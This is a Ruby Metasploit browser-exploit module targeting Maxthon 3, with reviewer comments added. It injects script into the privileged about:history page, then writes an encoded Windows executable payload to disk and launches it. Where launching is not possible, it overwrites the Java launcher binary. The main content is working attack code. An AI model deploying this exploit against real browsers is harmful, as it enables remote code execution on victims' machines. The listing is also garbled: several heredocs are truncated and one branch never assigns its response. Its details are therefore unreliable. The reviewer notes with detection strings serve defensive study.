require 'msf/core'

# Metasploit browser-exploit module: "Maxthon about:history XCS".
# Per its own metadata it serves an HTML page that injects script into the
# privileged about:history page of Maxthon 3. The class holds the usual two
# pieces of a Metasploit HttpServer module: the metadata/options constructor
# and the per-request HTTP handler.
#
# NOTE(review): this listing appears to have been HTML-stripped during
# extraction. Several %Q heredocs that originally carried markup are
# truncated (see the notes inside on_request_uri), so the code as shown is
# not syntactically/semantically complete. Compare against the upstream
# module before relying on any detail of its exact behavior.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata (name, description, references, payload and
  # target settings) and two user-configurable options:
  #   JPATH   - Windows path of the executable the served script overwrites
  #             when the maxthon.program object is not available
  #   JAVAURL - URL of a page hosting a Java applet, loaded in an iframe
  #             after the overwrite
  # Both values are interpolated verbatim into JavaScript double-quoted
  # string literals in on_request_uri; the JPATH default is therefore
  # escaped for that second (JavaScript) level of parsing, not just for Ruby.
  #
  # 'CVE' => 'TBA' is a placeholder, not an assigned identifier.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Maxthon about:history XCS',
      'Description'    => %q{
        Cross Context Scripting (XCS) is possible in the Maxthon about:history page.
        Injection in such privileged/trusted browser zone can be used to modify
        configuration settings and execute arbitrary commands. Affects Maxthon 3 browsers.
      },
      'License'        => BSD_LICENSE,
      'Author'         =>
        [
          'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
        ],
      'Version'        => '$Revision: 1 $',
      'References'     =>
        [
          ['CVE', 'TBA'],
          ['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html'],
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          ['Maxthon 3',
            {
              'Platform' => 'win',
            }
          ],
        ],
      'DisclosureDate' => 'Nov 26 2012',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']),
        OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']),
      ], self.class
    )
  end

  # HTTP handler for the module's web server. Dispatches on request.uri:
  #   ?jspayload    - regenerates the session payload as a Win32 PE, base64
  #                   encodes it and returns JavaScript that writes it to disk
  #                   through the maxthon.io API and launches it
  #   ?history      - returns a page whose onload redirects to about:history
  #   resource root - returns the initial page (truncated in this listing)
  #   anything else - 404 via send_not_found
  # The matched branches fall through to send_response_html + handler(cli);
  # the 404 paths return early.
  #
  # Detection note (defender side): the served responses are recognisable
  # by the literal strings "about:history", "maxthon.io.writeDataURL",
  # "maxthon.io.File.createTempFile" and the
  # "data:application/x-msdownload;base64," data-URL prefix, and by the
  # request suffixes "?jspayload" and "?history" on the module's resource URI.
  #
  # NOTE(review): `headers` is initialised but never populated; the HTML
  # wrapper strings below (html_hdr/html_ftr) look like stripped markup and
  # are almost certainly incomplete here.
  def on_request_uri(cli, request)
    jpath = datastore['JPATH']
    javaurl = datastore['JAVAURL']

    headers = {}

    html_hdr = %Q^ Loading ^
    html_ftr = %Q^

Loading

^

    case request.uri
    when /[?]jspayload/
      p = regenerate_payload(cli)
      if (p.nil?)
        send_not_found(cli)
        return
      end

      # We're going to run this through unescape(), so make sure
      # everything is encoded
      penc = Msf::Util::EXE.to_win32pe(framework, p.encoded)
      penc2 = Rex::Text.encode_base64(penc)

      # now this is base64 encoded payload which needs to be passed to the file write api in maxthon
      # depending on maxthon version, then file can be launched via Program DOM API
      # or replacing Java program
      #
      # NOTE(review): the JavaScript comment block inside this heredoc appears
      # damaged by extraction (e.g. the line beginning "wab.exe" is not a valid
      # JS comment) — line breaks below are reconstructed, not original.
      content = %Q{
        var fileTemp = new maxthon.io.File.createTempFile("test","exe");
        var fileObj = maxthon.io.File(fileTemp);
        maxthon.io.FileWriter(fileTemp);
        if(maxthon.program) {
          maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
          maxthon.program.Program.launch(fileTemp.name_,"C:");
        } else {
          // here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it
          // this is because the maxthon.program object has been silently removed in latest Maxthon versions...
          // in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe
          // e.g.
          wab.exe invoked via mailto://
          // however, in win7, a prompt will be displayed if browser executes a mail client or an external program
          // so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found
          // once that is done, then we can point to a page where a java applet exists which will invoke java.exe,
          // unless previously loaded by the user //
          fileTemp.name_ = "#{jpath}";
          maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
          a=document.createElement("iframe");
          a.setAttribute("src","#{javaurl}");
          document.body.appendChild(a)
        }
      }

    when /[?]history/
      js = %Q^
        window.onload = function() {
          location.href = "about:history";
        }
      ^
      # NOTE(review): `js` is built but not interpolated into `content` as
      # shown — the enclosing script markup was presumably stripped.
      content = %Q^
        #{html_hdr}
        #{html_ftr}
      ^

    when get_resource()
      print_status("Sending #{self.name} payload for request #{request.uri}")

      # NOTE(review): this heredoc is truncated in the listing; `content` is
      # never assigned in this branch, so send_response_html would receive nil.
      js = %Q^
        url = location.href;
        url2 = url + "?jspayload=1";
        inj = "?history#%22/>
        #{js}
        #{html_ftr}
      ^

    else
      print_status("Sending 404 for request #{request.uri}")
      send_not_found(cli)
      return
    end

    send_response_html(cli, content, headers)
    handler(cli)
  end
end